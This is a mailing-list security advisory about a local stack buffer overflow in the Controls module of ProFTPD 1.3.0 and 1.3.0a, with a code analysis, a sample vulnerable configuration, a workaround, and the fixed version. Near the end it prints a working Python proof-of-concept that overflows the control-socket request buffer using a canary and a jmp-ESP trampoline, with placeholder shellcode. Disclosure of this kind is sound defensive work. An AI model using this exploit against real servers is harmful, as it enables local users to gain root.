[UNIX] ProFTPD Controls Buffer Overflow



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



ProFTPD Controls Buffer Overflow
------------------------------------------------------------------------


SUMMARY

A locally exploitable stack overflow vulnerability has been found in the
mod_ctrls module of ProFTPD server.

ProFTPD is a commonly used and highly configurable FTP server for Unix and
Windows systems. This server is available as an optional package in most
recent Linux distributions, including Debian (sid), Mandriva 2007 and
Ubuntu Edgy. For more information concerning ProFTPD, refer to the site
http <://www.proftpd.org/> ://www.proftpd.org/

The vulnerability is located in the "Controls" module. This is an optional
feature of ProFTPD server, that must be activated in the configuration
file. Controls are a way to communicate directly with a standalone ProFTPD
daemon while it is running. This provides administrators a way to alter
the daemon's behavior in real time, without having to restart the daemon
and have it re-read its configuration. The Controls feature allow
authorized users to locally manage parameters of the ProFTPD servers, like
aborting connections, managing users, changing log levels, disabling
individual virtual servers, etc.

The vulnerability allows local attackers with access to the Controls
features (and who have been allowed by Controls ACLs in proftpd.conf) to
gain root privileges.

DETAILS

Vulnerable Systems:
* ProFTPD version 1.3.0a
* ProFTPD version 1.3.0

Immune Systems:
* ProFTPD version 1.3.1rc1

Technical Description - Exploit/Concept Code:
The vulnerability exists in pr_ctrls_recv_request() function from
src/ctrls.c

Analysis of the vulnerability follows:
(Code from ProFTPD 1.3.0a, src/ctrls.c )

int pr_ctrls_recv_request(pr_ctrls_cl_t *cl) {
pr_ctrls_t *ctrl = NULL, *next_ctrl = NULL;
char reqaction[512] = {'\0'}, *reqarg = NULL;
size_t reqargsz = 0;
unsigned int nreqargs = 0, reqarglen = 0;

.
.
.

/* Next, read in the requested number of arguments. The client sends
* the arguments in pairs: first the length of the argument, then the
* argument itself. The first argument is the action, so get the first
* matching pr_ctrls_t (if present), and add the remaining arguments to
it.
*/

(1)

if (read(cl->cl_fd, &reqarglen, sizeof(unsigned int)) < 0) {
pr_signals_unblock();
return -1;
}

(2)

if (read(cl->cl_fd, reqaction, reqarglen) < 0) {
pr_signals_unblock();
return -1;
}
.
.
.
}

In (1) the integer 'reqarglen' is fully controlled by the attacker, as
it's read directly from the control socket. This allows an attacker to
control how much we read into the 'reqaction' variable in (2) (this
variable is in the stack).

Example of vulnerable configuration in proftpd.conf:
<IfModule mod_ctrls.c>
ControlsEngine on
ControlsACLs all allow group someuser
ControlsMaxClients 2
ControlsLog /var/log/proftpd/controls.log
ControlsInterval 5
ControlsSocket /tmp/ctrls.sock
ControlsSocketOwner someuser someuser
ControlsSocketACL allow group someuser
</IfModule>

ProFTPD must be compiled with mod_ctrls support ( --enable-ctrls ).

The following is a simple working proof-of-concept (Python).

References:
For more information concerning the Controls module, refer to
<http://www.castaglia.org/proftpd/doc/contrib/ProFTPD-mini-HOWTO-Controls.html> http://www.castaglia.org/proftpd/doc/contrib/ProFTPD-mini-HOWTO-Controls.html

Solution/Vendor Information/Workaround:
As a workaround, turn off the module mod_ctrls, with the following lines
added to proftpd.conf:

<IfModule mod_ctrls.c>
ControlsEngine off
</IfModule>

Alternatively, administrators can use the ControlsACLs directive in
proftpd.conf to restrict access only to trusted local users.

Version 1.3.1rc1 of ProFTPD, which fixes this issue, is available on the
<http://www.proftpd.org/> ProFTPD site.

Exploit:
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow

import socket
import os, os.path,stat

#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu
edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"

#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode

#Setup socket
#
if os.path.exists(mySocket):
os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket,stat.S_IRWXU)
s.connect(ctrlSocket)

#Send payload
#
s.send("\1\0\0\0")
s.send("\1\0\0\0")
l = len(payload)
s.send(chr(l & 255)+chr((l/255) & 255)+"\0\0")
s.send(payload)

#Finished
#
s.close()


ADDITIONAL INFORMATION

The information has been provided by <mailto:advisories@xxxxxxxxxxxxxxxx>
CORE Security Technologies Advisories.
The original article can be found at:
<http://www.coresecurity.com/?module=ContentMod&action=item&id=1594>
http://www.coresecurity.com/?module=ContentMod&action=item&id=1594



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.



Relevant Pages

  • Re: SupportSoft on an XP. What is it?
    ... ActiveX Controls Security Update ... we have been advised of a security vulnerability ... SupportSoft software is used to fix a problem on an end-user's computer. ...
    (microsoft.public.windowsxp.general)
  • Re: SupportSoft on an XP. What is it?
    ... ActiveX Controls Security Update ... we have been advised of a security vulnerability ... SupportSoft software is used to fix a problem on an end-user's computer. ...
    (microsoft.public.windowsxp.general)
  • [Full-disclosure] (resend) RE: [WEB SECURITY] Trustwaves SpiderLabs Security Advisory TWSL2010&#
    ... The key part of the advisory for me wasn't VIEWSTATE as much as it was the controls, but this statement you made seemed pretty outrageous: ... 'These vulnerabilities show that unsigned client-side viewstates will ALWAYS result in a vulnerability in the affected products.' ... You made a reference to how other controls are also vulnerable to this attack. ... [WEB SECURITY] Trustwave's SpiderLabs Security Advisory TWSL2010-001 ...
    (Full-Disclosure)
  • Re: [Full-disclosure] [WEB SECURITY] Trustwaves SpiderLabs Security Advisory TWSL2010-001
    ... The key part of the advisory for me wasn't VIEWSTATE as much as it was the controls, but this statement you made seemed pretty: ... 'These vulnerabilities show that unsigned client-side viewstates will ALWAYS result in a vulnerability in the affected products.' ... You made a reference to how other controls are also vulnerable to this attack. ... [WEB SECURITY] Trustwave's SpiderLabs Security Advisory TWSL2010-001 ...
    (Full-Disclosure)
  • [OpenPKG-SA-2006.039] OpenPKG Security Advisory (proftpd)
    ... Advisory Id: OpenPKG-SA-2006.039 ... A vulnerability exists in the FTP server ProFTPD, ... Controls are a way to communicate directly with a standalone ProFTPD ...
    (Bugtraq)